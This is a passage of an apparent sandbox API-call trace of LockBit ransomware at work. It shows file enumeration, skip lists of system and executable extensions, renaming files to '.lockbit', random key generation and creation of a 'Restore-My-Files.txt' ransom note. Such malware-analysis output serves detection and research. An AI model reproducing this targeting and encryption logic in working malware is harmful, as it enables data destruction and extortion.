lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195384.WMF") returned 1 [0196.626] lstrcmpiW (lpString1="ntldr", lpString2="J0195384.WMF") returned 1 [0196.626] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195384.WMF") returned 1 [0196.626] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195384.WMF") returned -1 [0196.626] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195384.WMF") returned -1 [0196.626] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195384.WMF") returned 1 [0196.626] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195384.WMF") returned -1 [0196.626] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.626] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195384.WMF") returned=".WMF" [0196.626] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.626] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.626] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.627] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.627] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195384.WMF.lockbit") returned 70 [0196.627] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195384.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0195384.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0196.629] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.629] malloc (_Size=0x40068) returned 0x3d70450 [0196.629] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=12762) returned 1 [0196.629] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0196.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0196.630] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.635] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195384.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195384.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.635] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.635] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.637] free (_Block=0x1fa2ed8) [0196.637] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195384.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.637] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.637] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.637] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa438000, ftCreationTime.dwHighDateTime=0x1be2705, ftLastAccessTime.dwLowDateTime=0xbd4a0b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfa438000, ftLastWriteTime.dwHighDateTime=0x1be2705, nFileSizeHigh=0x0, nFileSizeLow=0x275c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195534.WMF", cAlternateFileName="")) returned 1 [0196.637] lstrcmpiW (lpString1=".", lpString2="J0195534.WMF") returned -1 [0196.637] lstrcmpiW (lpString1="..", lpString2="J0195534.WMF") returned -1 [0196.637] PathFindExtensionW (pszPath="J0195534.WMF") returned=".WMF" [0196.637] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.637] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.637] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.637] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.637] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.637] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.637] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.638] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.638] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.639] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195534.WMF") returned 1 [0196.639] lstrcmpiW (lpString1="ntldr", lpString2="J0195534.WMF") returned 1 [0196.639] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195534.WMF") returned 1 [0196.640] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195534.WMF") returned -1 [0196.640] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195534.WMF") returned -1 [0196.640] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195534.WMF") returned 1 [0196.640] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195534.WMF") returned -1 [0196.640] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.640] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195534.WMF") returned=".WMF" [0196.640] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.640] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.640] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.641] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.641] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195534.WMF.lockbit") returned 70 [0196.641] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195534.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0195534.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0196.647] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.647] malloc (_Size=0x40068) returned 0x3f70048 [0196.647] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=10076) returned 1 [0196.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0196.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0196.648] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.652] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195534.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195534.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.652] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.652] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.653] free (_Block=0x1fa2ed8) [0196.653] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195534.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.653] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.653] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.653] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x455d9300, ftCreationTime.dwHighDateTime=0x1be2706, ftLastAccessTime.dwLowDateTime=0xbd4a0b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x455d9300, ftLastWriteTime.dwHighDateTime=0x1be2706, nFileSizeHigh=0x0, nFileSizeLow=0xfca, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195812.WMF", cAlternateFileName="")) returned 1 [0196.654] lstrcmpiW (lpString1=".", lpString2="J0195812.WMF") returned -1 [0196.654] lstrcmpiW (lpString1="..", lpString2="J0195812.WMF") returned -1 [0196.654] PathFindExtensionW (pszPath="J0195812.WMF") returned=".WMF" [0196.654] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.654] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.655] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.655] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195812.WMF") returned 1 [0196.656] lstrcmpiW (lpString1="ntldr", lpString2="J0195812.WMF") returned 1 [0196.656] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195812.WMF") returned 1 [0196.656] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195812.WMF") returned -1 [0196.656] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195812.WMF") returned -1 [0196.656] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195812.WMF") returned 1 [0196.656] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195812.WMF") returned -1 [0196.656] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.656] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195812.WMF") returned=".WMF" [0196.656] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.656] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.656] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.657] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.657] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195812.WMF.lockbit") returned 70 [0196.658] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195812.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0195812.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.659] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.659] malloc (_Size=0x40068) returned 0x3df0008 [0196.659] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4042) returned 1 [0196.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.661] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.666] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195812.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195812.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.666] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.666] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.673] free (_Block=0x1fa2ed8) [0196.673] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195812.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.674] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.674] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 